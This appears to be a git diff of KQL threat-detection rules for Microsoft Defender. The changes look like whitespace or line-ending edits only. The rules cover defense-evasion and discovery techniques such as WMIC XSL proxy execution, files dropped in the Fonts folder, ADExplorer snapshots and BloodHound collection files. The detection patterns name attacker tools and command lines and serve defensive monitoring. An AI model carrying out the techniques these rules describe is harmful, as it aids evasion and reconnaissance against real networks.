@@ -1,14 +1,14 @@ -// Title: WMIC Loading Scripting Libraries -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-17 -// Level: medium -// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1220 -// False Positives: -// - The command wmic os get lastboottuptime loads vbscript.dll -// - The command wmic os get locale loads vbscript.dll -// - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights - -DeviceImageLoadEvents +// Title: WMIC Loading Scripting Libraries +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-17 +// Level: medium +// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - The command wmic os get lastboottuptime loads vbscript.dll +// - The command wmic os get locale loads vbscript.dll +// - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights + +DeviceImageLoadEvents | where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql index 32824f74..a65f6e63 100644 --- a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql +++ b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql @@ -1,11 +1,11 @@ -// Title: Write Protect For Storage Disabled -// Author: Sreeman -// Date: 2021-06-11 -// Level: medium -// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. -// This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562 - -DeviceProcessEvents +// Title: Write Protect For Storage Disabled +// Author: Sreeman +// Date: 2021-06-11 +// Level: medium +// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. +// This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceProcessEvents | where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql b/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql index 998683c9..813a859f 100644 --- a/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql +++ b/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql @@ -1,10 +1,10 @@ -// Title: Writing Of Malicious Files To The Fonts Folder -// Author: Sreeman -// Date: 2020-04-21 -// Level: medium -// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. -// MITRE Tactic: Defense Evasion -// Tags: attack.t1211, attack.t1059, attack.defense-evasion, attack.persistence, attack.execution - -DeviceProcessEvents +// Title: Writing Of Malicious Files To The Fonts Folder +// Author: Sreeman +// Date: 2020-04-21 +// Level: medium +// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1211, attack.t1059, attack.defense-evasion, attack.persistence, attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql b/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql index 97d8461a..9a351895 100644 --- a/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql +++ b/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql @@ -1,12 +1,12 @@ -// Title: WSL Kali-Linux Usage -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-10 -// Level: high -// Description: Detects the use of Kali Linux through Windows Subsystem for Linux -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 -// False Positives: -// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams - -DeviceProcessEvents +// Title: WSL Kali-Linux Usage +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-10 +// Level: high +// Description: Detects the use of Kali Linux through Windows Subsystem for Linux +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams + +DeviceProcessEvents | where (((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\packages\\KaliLinux") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\kali.exe")) or (FolderPath contains ":\\Program Files\\WindowsApps\\KaliLinux." and FolderPath endswith "\\kali.exe")) or ((((FolderPath contains "\\kali.exe" or FolderPath contains "\\KaliLinux") or (ProcessCommandLine contains "Kali.exe" or ProcessCommandLine contains "Kali-linux" or ProcessCommandLine contains "kalilinux")) and (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe")) and (not((ProcessCommandLine contains " -i " or ProcessCommandLine contains " --install " or ProcessCommandLine contains " --unregister ")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql index 0be93573..6204c9b9 100644 --- a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql +++ b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql @@ -1,12 +1,12 @@ -// Title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-01 -// Level: medium -// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 -// False Positives: -// - Legitimate ".xbap" being executed via "PresentationHost" - -DeviceProcessEvents +// Title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-01 +// Level: medium +// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Legitimate ".xbap" being executed via "PresentationHost" + +DeviceProcessEvents | where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql index c3d95d22..09ee5359 100644 --- a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql +++ b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql @@ -1,15 +1,15 @@ -// Title: XSL Script Execution Via WMIC.EXE -// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel -// Date: 2019-10-21 -// Level: medium -// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files. -// Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. -// Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1220 -// False Positives: -// - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. -// - Static format arguments - https://petri.com/command-line-wmi-part-3 - -DeviceProcessEvents +// Title: XSL Script Execution Via WMIC.EXE +// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel +// Date: 2019-10-21 +// Level: medium +// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files. +// Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. +// Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. +// - Static format arguments - https://petri.com/command-line-wmi-part-3 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format" or ProcessCommandLine contains "–format" or ProcessCommandLine contains "—format" or ProcessCommandLine contains "―format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql index f09e0895..f408fd67 100644 --- a/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql +++ b/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql @@ -1,10 +1,10 @@ -// Title: Active Directory Database Snapshot Via ADExplorer -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-14 -// Level: medium -// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 - -DeviceProcessEvents +// Title: Active Directory Database Snapshot Via ADExplorer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 + +DeviceProcessEvents | where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") \ No newline at end of file diff --git a/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql b/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql index 72ac1e7b..3bf1823b 100644 --- a/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql +++ b/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql @@ -1,12 +1,12 @@ -// Title: ADExplorer Writing Complete AD Snapshot Into .dat File -// Author: Arnim Rupp (Nextron Systems), Thomas Patzke -// Date: 2025-07-09 -// Level: medium -// Description: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 -// False Positives: -// - Legitimate use of ADExplorer by administrators creating .dat snapshots - -DeviceFileEvents +// Title: ADExplorer Writing Complete AD Snapshot Into .dat File +// Author: Arnim Rupp (Nextron Systems), Thomas Patzke +// Date: 2025-07-09 +// Level: medium +// Description: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 +// False Positives: +// - Legitimate use of ADExplorer by administrators creating .dat snapshots + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\ADExp.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64a.exe") and FolderPath endswith ".dat" \ No newline at end of file diff --git a/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql b/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql index 66ee8f06..c97e2db0 100644 --- a/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql +++ b/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql @@ -1,12 +1,12 @@ -// Title: Advanced IP Scanner - File Event -// Author: @ROxPinTeddy -// Date: 2020-05-12 -// Level: medium -// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046 -// False Positives: -// - Legitimate administrative use - -DeviceFileEvents +// Title: Advanced IP Scanner - File Event +// Author: @ROxPinTeddy +// Date: 2020-05-12 +// Level: medium +// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administrative use + +DeviceFileEvents | where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2" \ No newline at end of file diff --git a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql index b32cb1dd..ebd0a0c3 100644 --- a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql +++ b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql @@ -1,11 +1,11 @@ -// Title: Azure AD Health Monitoring Agent Registry Keys Access -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC -// Date: 2021-08-26 -// Level: medium -// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. -// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1012 - -DeviceRegistryEvents +// Title: Azure AD Health Monitoring Agent Registry Keys Access +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-08-26 +// Level: medium +// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. +// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012 + +DeviceRegistryEvents | where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql index 8bc9d78c..14234cf9 100644 --- a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql +++ b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql @@ -1,13 +1,13 @@ -// Title: Azure AD Health Service Agents Registry Keys Access -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC -// Date: 2021-08-26 -// Level: medium -// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). -// Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). -// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. -// Make sure you set the SACL to propagate to its sub-keys. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1012 - -DeviceRegistryEvents +// Title: Azure AD Health Service Agents Registry Keys Access +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-08-26 +// Level: medium +// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). +// Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). +// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. +// Make sure you set the SACL to propagate to its sub-keys. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012 + +DeviceRegistryEvents | where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\ADHealthAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/bloodhound_collection_files.kql b/KQL/rules/Discovery/bloodhound_collection_files.kql index 3a14b15a..d7712fac 100644 --- a/KQL/rules/Discovery/bloodhound_collection_files.kql +++ b/KQL/rules/Discovery/bloodhound_collection_files.kql @@ -1,12 +1,12 @@ -// Title: BloodHound Collection Files -// Author: C.J. May -// Date: 2022-08-09 -// Level: high -// Description: Detects default file names outputted by the BloodHound collection tool SharpHound -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 -// False Positives: -// - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise - -DeviceFileEvents +// Title: BloodHound Collection Files +// Author: C.J. May +// Date: 2022-08-09 +// Level: high +// Description: Detects default file names outputted by the BloodHound collection tool SharpHound +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 +// False Positives: +// - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise + +DeviceFileEvents | where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft."))) \ No newline at end of file diff --git a/KQL/rules/Discovery/capabilities_discovery_linux.kql b/KQL/rules/Discovery/capabilities_discovery_linux.kql index 32b05ec8..30c6e8d6 100644 --- a/KQL/rules/Discovery/capabilities_discovery_linux.kql +++ b/KQL/rules/Discovery/capabilities_discovery_linux.kql @@ -1,10 +1,10 @@ -// Title: Capabilities Discovery - Linux -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-28 -// Level: low -// Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Capabilities Discovery - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: low +// Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where (ProcessCommandLine contains " -r " or ProcessCommandLine contains " /r " or ProcessCommandLine contains " –r " or ProcessCommandLine contains " —r " or ProcessCommandLine contains " ―r ") and FolderPath endswith "/getcap" \ No newline at end of file diff --git a/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql b/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql index c7b93053..04dd2819 100644 --- a/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql +++ b/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql @@ -1,12 +1,12 @@ -// Title: Computer Discovery And Export Via Get-ADComputer Cmdlet -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-11-10 -// Level: medium -// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033 -// False Positives: -// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often - -DeviceProcessEvents +// Title: Computer Discovery And Export Via Get-ADComputer Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-10 +// Level: medium +// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 +// False Positives: +// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often + +DeviceProcessEvents | where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql index 76de5d85..9658071a 100644 --- a/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Computer System Reconnaissance Via Wmic.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-08 -// Level: medium -// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Computer System Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-08 +// Level: medium +// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1047 + +DeviceProcessEvents | where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql b/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql index 25950e0e..5a6c2531 100644 --- a/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql +++ b/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql @@ -1,13 +1,13 @@ -// Title: Console CodePage Lookup Via CHCP -// Author: _pete_0, TheDFIRReport -// Date: 2022-02-21 -// Level: medium -// Description: Detects use of chcp to look up the system locale value as part of host discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1614.001 -// False Positives: -// - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command. -// - Discord was seen using chcp to look up code pages - -DeviceProcessEvents +// Title: Console CodePage Lookup Via CHCP +// Author: _pete_0, TheDFIRReport +// Date: 2022-02-21 +// Level: medium +// Description: Detects use of chcp to look up the system locale value as part of host discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1614.001 +// False Positives: +// - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command. +// - Discord was seen using chcp to look up code pages + +DeviceProcessEvents | where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " –c " or InitiatingProcessCommandLine contains " —c " or InitiatingProcessCommandLine contains " ―c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " –r " or InitiatingProcessCommandLine contains " —r " or InitiatingProcessCommandLine contains " ―r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k " or InitiatingProcessCommandLine contains " –k " or InitiatingProcessCommandLine contains " —k " or InitiatingProcessCommandLine contains " ―k ") and InitiatingProcessFolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql b/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql index 3a44de69..450e7d9c 100644 --- a/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql +++ b/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql @@ -1,13 +1,13 @@ -// Title: Container Residence Discovery Via Proc Virtual FS -// Author: Seth Hanford -// Date: 2023-08-23 -// Level: low -// Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 -// False Positives: -// - Legitimate system administrator usage of these commands -// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered - -DeviceProcessEvents +// Title: Container Residence Discovery Via Proc Virtual FS +// Author: Seth Hanford +// Date: 2023-08-23 +// Level: low +// Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate system administrator usage of these commands +// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered + +DeviceProcessEvents | where (FolderPath endswith "awk" or FolderPath endswith "/cat" or FolderPath endswith "grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nl" or FolderPath endswith "/tail") and (ProcessCommandLine contains "/proc/2/" or (ProcessCommandLine contains "/proc/" and (ProcessCommandLine endswith "/cgroup" or ProcessCommandLine endswith "/sched"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/crontab_enumeration.kql b/KQL/rules/Discovery/crontab_enumeration.kql index 5aa3bfde..a5d0476b 100644 --- a/KQL/rules/Discovery/crontab_enumeration.kql +++ b/KQL/rules/Discovery/crontab_enumeration.kql @@ -1,12 +1,12 @@ -// Title: Crontab Enumeration -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: low -// Description: Detects usage of crontab to list the tasks of the user -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1007 -// False Positives: -// - Legitimate use of crontab - -DeviceProcessEvents +// Title: Crontab Enumeration +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: low +// Description: Detects usage of crontab to list the tasks of the user +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1007 +// False Positives: +// - Legitimate use of crontab + +DeviceProcessEvents | 